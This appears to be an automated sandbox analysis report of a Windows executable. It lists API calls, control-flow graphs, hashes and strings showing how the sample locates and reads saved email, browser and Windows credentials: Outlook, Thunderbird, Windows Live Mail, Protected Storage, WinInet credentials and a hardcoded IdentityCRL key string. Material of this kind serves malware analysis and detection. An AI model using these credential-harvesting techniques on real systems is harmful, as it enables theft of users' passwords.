                                                                                                                                                                                                                                      • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                                                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402181
                                                                                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040219C
                                                                                                                                                                                                                                      • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                                                                                                                                                    • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                                                                                                                                    • API String ID: 1846531875-4223776976
                                                                                                                                                                                                                                    • Opcode ID: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                                                                                                                                                                    • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll,75C50A60,?,00000000,?,?,?,0040CF60,75C50A60), ref: 00404AB8
                                                                                                                                                                                                                                      • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                                                                                                                                      • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,75C50A60), ref: 00404ADE
                                                                                                                                                                                                                                      • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                                                                                                                                                    • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                                                                                                                                                    • API String ID: 745651260-375988210
                                                                                                                                                                                                                                    • Opcode ID: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                                                                                                                                                                    • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                                                                                                                                                    • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                                                                                                                                                    • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                                                                                                                                                    • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                                                                                                                                                    • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                                                                                                                                                    • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                                                                                                                                                    • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                                                                                                                                                    • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                                                                                                                                                    • PStoreCreateInstance, xrefs: 00403C44
                                                                                                                                                                                                                                    • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                                                                                                                                                    • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                                                                                                                                                    • pstorec.dll, xrefs: 00403C30
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                                                                                                                                                    • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                                                                                                                                    • API String ID: 1197458902-317895162
                                                                                                                                                                                                                                    • Opcode ID: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                                                                                                                                                    • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 231 44b49f-44b4b0 call 444e38 GetModuleHandleA 235 444c87-444d00 __set_app_type __p__fmode __p__commode call 444e34 231->235 236 444c68-444c73 231->236 242 444d02-444d0d __setusermatherr 235->242 243 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 235->243 236->235 237 444c75-444c85 236->237 237->235 242->243 246 444d6a-444d72 243->246 247 444d74-444d76 246->247 248 444d78-444d7b 246->248 247->246 247->248 249 444d81-444d85 248->249 250 444d7d-444d7e 248->250 251 444d87-444d89 249->251 252 444d8b-444dc6 GetStartupInfoA GetModuleHandleA call 40cf44 249->252 250->249 251->250 251->252 257 444dcf-444e0f _cexit call 444e71 252->257 258 444dc8-444dc9 exit 252->258 258->257
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                                                                    • String ID: h4ND
                                                                                                                                                                                                                                    • API String ID: 3662548030-3825183422
                                                                                                                                                                                                                                    • Opcode ID: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                                                                                                                                                                    • Instruction ID: 35bbd85eb0bb2ce5e1f1b9c4bc8677619723fc104b62ea38f54f9f601267cc63
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D941D3B5C023449FEB619FA4DC847AD7BB4FB49325B28412BE451A32A1D7788D41CB5C

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 262 40fb00-40fb35 call 44b090 RegOpenKeyExA 265 40fc37-40fc3d 262->265 266 40fb3b-40fb4f RegOpenKeyExA 262->266 267 40fb55-40fb7e RegQueryValueExA 266->267 268 40fc2d-40fc31 RegCloseKey 266->268 269 40fc23-40fc27 RegCloseKey 267->269 270 40fb84-40fb93 call 404734 267->270 268->265 269->268 270->269 273 40fb99-40fbd1 call 4047a5 270->273 273->269 276 40fbd3-40fbdb 273->276 277 40fc19-40fc1d LocalFree 276->277 278 40fbdd-40fc14 memcpy * 2 call 40f802 276->278 277->269 278->277
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                                                                                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                                                                                                                                                                      • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                                                                                                                                      • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                                                                                                                                                      • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                                                                                      • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                                                                                                                                    • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                                                                                                                                                    • API String ID: 2768085393-1693574875
                                                                                                                                                                                                                                    • Opcode ID: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                                                                                                                                                                                                    • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0044430B
                                                                                                                                                                                                                                      • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                                                                                                                                                      • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                                                                                                                                                      • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                                                                                                                                                      • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                                                                                                                                                      • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                                                                                      • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00444379
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00444394
                                                                                                                                                                                                                                      • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 004443DB
                                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 00444401
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                                                                                                                                                    • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                                                                                                                                                    • Store Root, xrefs: 004443A5
                                                                                                                                                                                                                                    • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                                                                                                                                    • API String ID: 832325562-2578778931
                                                                                                                                                                                                                                    • Opcode ID: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                                                                                                                                                                                    • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 301 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 306 40f5c3-40f5ea RegQueryValueExA 301->306 307 40f6d9-40f6df 301->307 308 40f6d0-40f6d3 RegCloseKey 306->308 309 40f5f0-40f5f4 306->309 308->307 309->308 310 40f5fa-40f604 309->310 311 40f606-40f618 call 40466b call 404734 310->311 312 40f677 310->312 322 40f66a-40f675 call 404785 311->322 323 40f61a-40f63e call 4047a5 311->323 313 40f67a-40f67d 312->313 313->308 315 40f67f-40f6bf call 4012ee RegQueryValueExA 313->315 315->308 321 40f6c1-40f6cf 315->321 321->308 322->313 323->322 328 40f640-40f643 323->328 329 40f661-40f664 LocalFree 328->329 330 40f645-40f65a memcpy 328->330 329->322 330->329
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F567
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F57F
                                                                                                                                                                                                                                      • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                                                                                                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                                                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                                                                    • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2012582556-3916222277
                                                                                                                                                                                                                                    • Opcode ID: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                                                                                                                                                                    • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 331 4086e0-408704 call 4045db 334 4088f7-408906 call 404656 331->334 335 40870a-408716 331->335 337 408718-40872b CredEnumerateW 335->337 338 40872d-408731 335->338 337->338 338->334 341 408737-408764 wcslen 338->341 343 40876a 341->343 344 4088ef-4088f3 LocalFree 341->344 345 40876f-408774 343->345 344->334 345->344 346 40877a-40879e wcsncmp 345->346 347 4087a4-4087bb 346->347 348 4088dd-4088e9 346->348 347->347 349 4087bd-4087ee call 40466b call 404734 347->349 348->344 348->345 354 4088d1-4088d8 call 404785 349->354 355 4087f4-40880c call 4047a5 349->355 354->348 355->354 359 408812-408838 memset 355->359 360 40883a 359->360 361 40883c-4088a9 memcpy wcschr 359->361 360->361 362 4088b7-4088cb LocalFree 361->362 363 4088ab-4088b3 361->363 362->354 363->362
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040874A
                                                                                                                                                                                                                                    • wcsncmp.MSVCRT ref: 00408794
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040882A
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040889F
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                                                                                                                                                    • LocalFree.KERNELBASE(?), ref: 004088F3
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressProc$FreeLocal$LibraryLoadmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                                                                    • String ID: J$Microsoft_WinInet
                                                                                                                                                                                                                                    • API String ID: 3950215071-260894208
                                                                                                                                                                                                                                    • Opcode ID: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                                                                                                                                                                                                    • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 365 4037ca-40381c memset * 2 call 444551 368 4038e2-4038e5 365->368 369 403822-403882 call 4021b6 call 406f06 * 2 strchr 365->369 376 403884-403895 _mbscpy 369->376 377 403897-4038a2 strlen 369->377 378 4038bf-4038dd _mbscpy call 4023e5 376->378 377->378 379 4038a4-4038bc sprintf 377->379 378->368 379->378
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004037EB
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004037FF
                                                                                                                                                                                                                                      • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                                                                                                                                                      • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                                                                                                                                    • strchr.MSVCRT ref: 0040386E
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00403897
                                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 004038B7
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                                                                                                                                    • String ID: %s@yahoo.com
                                                                                                                                                                                                                                    • API String ID: 317221925-3288273942
                                                                                                                                                                                                                                    • Opcode ID: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                                                                                                                                                                    • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
